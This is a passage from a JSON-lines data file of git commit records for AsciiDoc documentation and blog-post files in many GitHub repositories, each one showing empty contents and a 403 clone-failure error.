RNS-1203.\n","repos":"ironbee\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee","old_file":"docs\/reference-manual\/module-authscan.adoc","new_file":"docs\/reference-manual\/module-authscan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/b1v1r\/ironbee.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ef9233921cb9afd8000cc6a7d219c1f09df427f","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58b64eaf223941b26927a70bbc76beb16aeeb721","subject":"Update 2017-11-02-Meetup-Paris-Cognitives-Services-2-Azure-Vision.adoc","message":"Update 2017-11-02-Meetup-Paris-Cognitives-Services-2-Azure-Vision.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2017-11-02-Meetup-Paris-Cognitives-Services-2-Azure-Vision.adoc","new_file":"_posts\/2017-11-02-Meetup-Paris-Cognitives-Services-2-Azure-Vision.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa88f0a7b01f88976a0e2f39f8f3f0996c5fee2d","subject":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","message":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49512970fd65b426f24f4d030c676ec05344900c","subject":"Corrected some grammatical errors","message":"Corrected some grammatical errors\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34e1b419764c3f6d50ac9ae41bc3897e57c89534","subject":"y2b create post Ion iCADE Arcade Cabinet for iPad \\u0026 iPad 2","message":"y2b create post Ion iCADE Arcade Cabinet for iPad \\u0026 iPad 2","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-02-Ion-iCADE-Arcade-Cabinet-for-iPad-u0026-iPad-2.adoc","new_file":"_posts\/2011-08-02-Ion-iCADE-Arcade-Cabinet-for-iPad-u0026-iPad-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73e148cc4e857389c86a8aed149e7741c399aea3","subject":"Update 2015-10-12-Smart-Health-Management-Part-3-Quantified-Baby.adoc","message":"Update 2015-10-12-Smart-Health-Management-Part-3-Quantified-Baby.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-Smart-Health-Management-Part-3-Quantified-Baby.adoc","new_file":"_posts\/2015-10-12-Smart-Health-Management-Part-3-Quantified-Baby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba5386e3ec3a7a49b6cc9bde1cb12c4771a33961","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"965fb63da907645d76db25a038ca44d1a2959ec4","subject":"Update 2015-07-15-Testing-ASPNET-Web-API-with-Javascript.adoc","message":"Update 2015-07-15-Testing-ASPNET-Web-API-with-Javascript.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-07-15-Testing-ASPNET-Web-API-with-Javascript.adoc","new_file":"_posts\/2015-07-15-Testing-ASPNET-Web-API-with-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6844bcd16e762de7e6c9a73a7cf2fb1d16058659","subject":"Update 2015-10-06-Java8-et-JavaEE7-sont-dans-le-meme-POM.adoc","message":"Update 
2015-10-06-Java8-et-JavaEE7-sont-dans-le-meme-POM.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2015-10-06-Java8-et-JavaEE7-sont-dans-le-meme-POM.adoc","new_file":"_posts\/2015-10-06-Java8-et-JavaEE7-sont-dans-le-meme-POM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2478ff7d689577ca8c7244fce38e322af61ac7f5","subject":"#169: added README for entity","message":"#169: added README for entity\n","repos":"m-m-m\/util,m-m-m\/util","old_file":"entity\/README.adoc","new_file":"entity\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/util.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"517ca7dfc326ecc63a93c21525ded1f1fa1d0886","subject":"papers","message":"papers\n","repos":"mannyfin\/IRAS,mannyfin\/IRAS","old_file":"GUA work\/GUA papers\/Quick Notes on papers\/GUA info.adoc","new_file":"GUA work\/GUA papers\/Quick Notes on papers\/GUA info.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mannyfin\/IRAS.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b69af33648c5c011c8bfcd2bdde46df501f2ac43","subject":"Update 2017-05-19-I-want-faster-IDE.adoc","message":"Update 2017-05-19-I-want-faster-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-19-I-want-faster-IDE.adoc","new_file":"_posts\/2017-05-19-I-want-faster-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b92e8c1778098259982c858852c6ac975cc6eee","subject":"Update 2016-01-18-Level-up-your-programming-skills.adoc","message":"Update 2016-01-18-Level-up-your-programming-skills.adoc","repos":"regdog\/regdog.github.io,regdog\/regdog.github.io,regdog\/regdog.github.io","old_file":"_posts\/2016-01-18-Level-up-your-programming-skills.adoc","new_file":"_posts\/2016-01-18-Level-up-your-programming-skills.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/regdog\/regdog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac7d935309a5b0dfdea6cd3b3e7cda0a7134bea5","subject":"Update 2015-11-06-Test.adoc","message":"Update 2015-11-06-Test.adoc","repos":"adest\/press,adest\/press,adest\/press","old_file":"_posts\/2015-11-06-Test.adoc","new_file":"_posts\/2015-11-06-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adest\/press.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a44e51efd30c3bdf47e50572621bea95e359896c","subject":"Create 2017-27-05-test.adoc","message":"Create 2017-27-05-test.adoc","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2017-27-05-test.adoc","new_file":"_posts\/2017-27-05-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63abb612e6e982d18ef3816c3b048e344f3ac7aa","subject":"Update dbm-changelog-sync-sql.adoc","message":"Update dbm-changelog-sync-sql.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-changelog-sync-sql.adoc","new_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-changelog-sync-sql.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8ff1246d13b7a744eef6aa62d61acf320a1963d8","subject":"Update 2015-12-10-Trabalhando-com-CA-e-certificados-Auto-assinados.adoc","message":"Update 2015-12-10-Trabalhando-com-CA-e-certificados-Auto-assinados.adoc","repos":"euprogramador\/euprogramador.github.io,euprogramador\/euprogramador.github.io,euprogramador\/euprogramador.github.io","old_file":"_posts\/2015-12-10-Trabalhando-com-CA-e-certificados-Auto-assinados.adoc","new_file":"_posts\/2015-12-10-Trabalhando-com-CA-e-certificados-Auto-assinados.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/euprogramador\/euprogramador.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80824f1594a898e0321a7ea2c854a392a4510fa7","subject":"Update 2016-02-13-Nebengerausche-bei-der-Audioausgabe-Raspberry-Pi.adoc","message":"Update 2016-02-13-Nebengerausche-bei-der-Audioausgabe-Raspberry-Pi.adoc","repos":"StefanBertels\/stefanbertels.github.io,StefanBertels\/stefanbertels.github.io,StefanBertels\/stefanbertels.github.io,StefanBertels\/stefanbertels.github.io","old_file":"_posts\/2016-02-13-Nebengerausche-bei-der-Audioausgabe-Raspberry-Pi.adoc","new_file":"_posts\/2016-02-13-Nebengerausche-bei-der-Audioausgabe-Raspberry-Pi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/StefanBertels\/stefanbertels.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"309529fd56e09d4ddb47e28e30becdb79264d41f","subject":"Update 2017-12-18-P-H-Per-Golang.adoc","message":"Update 2017-12-18-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d277e9e53d35cf2b2f35f8795bf607c9b3d10d62","subject":"Deleted 2016-6-25-Git-one.adoc","message":"Deleted 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d95e66dc405ee035e75fcf68be336a18ec1c37f8","subject":"Update 
2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df206cd82eda598acd9ed1f292c7f0555c81396a","subject":"Update 2015-08-13-Reversing-and-Decrypting-the-Challenger-Encrypted-File-Format.adoc","message":"Update 2015-08-13-Reversing-and-Decrypting-the-Challenger-Encrypted-File-Format.adoc","repos":"reversergeek\/reversergeek.github.io,reversergeek\/reversergeek.github.io,reversergeek\/reversergeek.github.io","old_file":"_posts\/2015-08-13-Reversing-and-Decrypting-the-Challenger-Encrypted-File-Format.adoc","new_file":"_posts\/2015-08-13-Reversing-and-Decrypting-the-Challenger-Encrypted-File-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reversergeek\/reversergeek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"946c2234da54de825cd4e302c8bc7a97d42152b8","subject":"Update 2017-05-15-Common-Mistakes-in-C-Null-Terminating-Strings-and-comparisons.adoc","message":"Update 2017-05-15-Common-Mistakes-in-C-Null-Terminating-Strings-and-comparisons.adoc","repos":"lauesa\/Blog,lauesa\/Blog,lauesa\/Blog,lauesa\/Blog","old_file":"_posts\/2017-05-15-Common-Mistakes-in-C-Null-Terminating-Strings-and-comparisons.adoc","new_file":"_posts\/2017-05-15-Common-Mistakes-in-C-Null-Terminating-Strings-and-comparisons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lauesa\/Blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e2f9cca292629bef95b12606ae3f5502a70b981","subject":"y2b create post Deus Ex Human Revolution Augmented Edition Unboxing","message":"y2b create post Deus Ex Human Revolution Augmented Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-23-Deus-Ex-Human-Revolution-Augmented-Edition-Unboxing.adoc","new_file":"_posts\/2011-08-23-Deus-Ex-Human-Revolution-Augmented-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b86833e604f85b8e7550237b53c75ce7c6c076de","subject":"Rephr, Sonatype link","message":"Rephr, Sonatype link\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Maven.adoc","new_file":"Best practices\/Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d392014b4b1b49e31c391c299884b7c15defc0d","subject":"Added references and a bit of extra 
info","message":"Added references and a bit of extra info\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a101358ad8fbce1b1d9050a8bd32e2e0aeccd8c","subject":"y2b create post iPhone 7 Plus - Is There A Hissing Problem?","message":"y2b create post iPhone 7 Plus - Is There A Hissing Problem?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-18-iPhone-7-Plus--Is-There-A-Hissing-Problem.adoc","new_file":"_posts\/2016-09-18-iPhone-7-Plus--Is-There-A-Hissing-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f706c222f2b1605a199cb29eac04953ad9cd9bff","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97808d791c8e847bdad27b1ceab11da87458afbc","subject":"y2b create post PS Vita Cradle Unboxing (Dock) \\u0026 More!","message":"y2b create post PS Vita Cradle Unboxing (Dock) \\u0026 More!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-02-25-PS-Vita-Cradle-Unboxing-Dock-u0026-More.adoc","new_file":"_posts\/2012-02-25-PS-Vita-Cradle-Unboxing-Dock-u0026-More.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbc41c04b35ef8b206591e2652da3c3137174dcc","subject":"Kinesis blog post","message":"Kinesis blog post\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-08-30-streaming-mysql-data-changes-into-kinesis.adoc","new_file":"blog\/2018-08-30-streaming-mysql-data-changes-into-kinesis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"69f4d2b0c8f89b715cad50e378a79f940fb11962","subject":"BUG-5280: add asciidoc outline of CDS implementation","message":"BUG-5280: add asciidoc outline of CDS implementation\n\nAdds the basic document outlining requirements place on the data store,\nits architecture and basic tradeoffs taken. 
This is not a final revision,\nbut rather an initial cut at it. It is expected this document will evolve\nfurther and will remain updated as the design\/implementation changes.\n\nChange-Id: I77de9971beaf8303a7ae0e0d1fc0d4d86ae64e5c\nSigned-off-by: Robert Varga <b8bd3df785fdc0ff42dd1710c5d91998513c57ef@cisco.com>\n","repos":"opendaylight\/controller","old_file":"opendaylight\/md-sal\/sal-distributed-datastore\/src\/site\/asciidoc\/distributed-data-store.adoc","new_file":"opendaylight\/md-sal\/sal-distributed-datastore\/src\/site\/asciidoc\/distributed-data-store.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opendaylight\/controller.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"83d7f199c76195bca371ce356e4171722e95bd5e","subject":"Partial draft for Java Update-by-Query","message":"Partial draft for Java Update-by-Query\n","repos":"yanjunh\/elasticsearch,nazarewk\/elasticsearch,yanjunh\/elasticsearch,i-am-Nathan\/elasticsearch,scorpionvicky\/elasticsearch,JackyMai\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,dpursehouse\/elasticsearch,avikurapati\/elasticsearch,wenpos\/elasticsearch,Shepard1212\/elasticsearch,mikemccand\/elasticsearch,geidies\/elasticsearch,bawse\/elasticsearch,mortonsykes\/elasticsearch,uschindler\/elasticsearch,elasticdog\/elasticsearch,shreejay\/elasticsearch,i-am-Nathan\/elasticsearch,JackyMai\/elasticsearch,glefloch\/elasticsearch,umeshdangat\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,sneivandt\/elasticsearch,IanvsPoplicola\/elasticsearch,dongjoon-hyun\/elasticsearch,glefloch\/elasticsearch,geidies\/elasticsearch,kalimatas\/elasticsearch,avikurapati\/elasticsearch,ZTE-PaaS\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,Helen-Zhao\/elasticsearch,wuranbo\/elasticsearch,obourgain\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,s1monw\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,henakamaMSFT\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,MaineC\/elasticsearch,masaruh\/elasticsearch,dpursehouse\/elasticsearch,dongjoon-hyun\/elasticsearch,jimczi\/elasticsearch,a2lin\/elasticsearch,LewayneNaidoo\/elasticsearch,shreejay\/elasticsearch,elasticdog\/elasticsearch,nilabhsagar\/elasticsearch,sreeramjayan\/elasticsearch,mortonsykes\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,rlugojr\/elasticsearch,nezirus\/elasticsearch,brandonkearby\/elasticsearch,cwurm\/elasticsearch,sreeramjayan\/elasticsearch,gmarz\/elasticsearch,fforbeck\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,strapdata\/elassandra,MaineC\/elasticsearch,pozhidaevak\/elasticsearch,a2lin\/elasticsearch,dongjoon-hyun\/elasticsearch,liweinan0423\/elasticsearch,rajanm\/elasticsearch,C-Bish\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,henakamaMSFT\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,cwurm\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,s1monw\/elasticsearch,s1monw
\/elasticsearch,fernandozhu\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,MisterAndersen\/elasticsearch,JervyShi\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,ricardocerq\/elasticsearch,mjason3\/elasticsearch,winstonewert\/elasticsearch,s1monw\/elasticsearch,vroyer\/elassandra,LewayneNaidoo\/elasticsearch,LeoYao\/elasticsearch,girirajsharma\/elasticsearch,Shepard1212\/elasticsearch,StefanGor\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra5-rc,kalimatas\/elasticsearch,wenpos\/elasticsearch,JackyMai\/elasticsearch,uschindler\/elasticsearch,Helen-Zhao\/elasticsearch,kalimatas\/elasticsearch,JervyShi\/elasticsearch,fernandozhu\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,sreeramjayan\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,strapdata\/elassandra5-rc,strapdata\/elassandra,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,bawse\/elasticsearch,henakamaMSFT\/elasticsearch,Helen-Zhao\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,avikurapati\/elasticsearch,qwerty4030\/elasticsearch,zkidkid\/elasticsearch,JackyMai\/elasticsearch,cwurm\/elasticsearch,MisterAndersen\/elasticsearch,gmarz\/elasticsearch,shreejay\/elasticsearch,girirajsharma\/elasticsearch,wuranbo\/elasticsearch,sreeramjayan\/elasticsearch,bawse\/elasticsearch,zkidkid\/elasticsearch,elasticdog\/elasticsearch,bawse\/elasticsearch,Stacey-Gammon\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,artnowo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lks21c\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,awislowski\/elasticsearch,maddin2016\/elasticsearch,Helen-Zhao\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,JSCooke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,dongjoon-hyun\/elasticsearch,yanjunh\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,geidies\/elasticsearch,awislowski\/elasticsearch,nknize\/elasticsearch,dpursehouse\/elasticsearch,geidies\/elasticsearch,vroyer\/elasticassandra,elasticdog\/elasticsearch,awislowski\/elasticsearch,rajanm\/elasticsearch,mikemccand\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,girirajsharma\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,cwurm\/elasticsearch,elasticdog\/elasticsearch,avikurapati\/elasticsearch,rlugojr\/elasticsearch,GlenRSmith\/elasticsearch,JSCooke\/elasticsearch,yanjunh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,yanjunh\/elasticsearch,strapdata\/elassandra5-rc,liweinan0423\/elasticsearch,spiegela\/elasticsearch,ricardocerq\/elasticsearch,HonzaKral\/elasticsearch,ZTE-PaaS\/elasticsearch,shreejay\/elasticsearch,MisterAndersen\/elasticsearch,artnowo\/elasticsearch,scottsom\/elasticsearch,nezirus\/elasticsearch,ZTE-PaaS\/elasticsearch,glefloch\/elasticsearch,alexshadow007\/elasticsearch,glefloch\/elasticsearch,fernandozhu\/elasticsearch,strapdata\/elassandra5-rc,C-Bish\/elasticsearch,zkidkid\/elasticsearch,jprante\/elasticsearch,sneivandt\/elasticsearch,alexshadow007\/elasticsearch,JackyMai\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,StefanGor\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,henakamaMSFT\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,ricardocerq\/elasticsearch,sreeramjayan\/elasticsearch,artnowo\/elasticsea
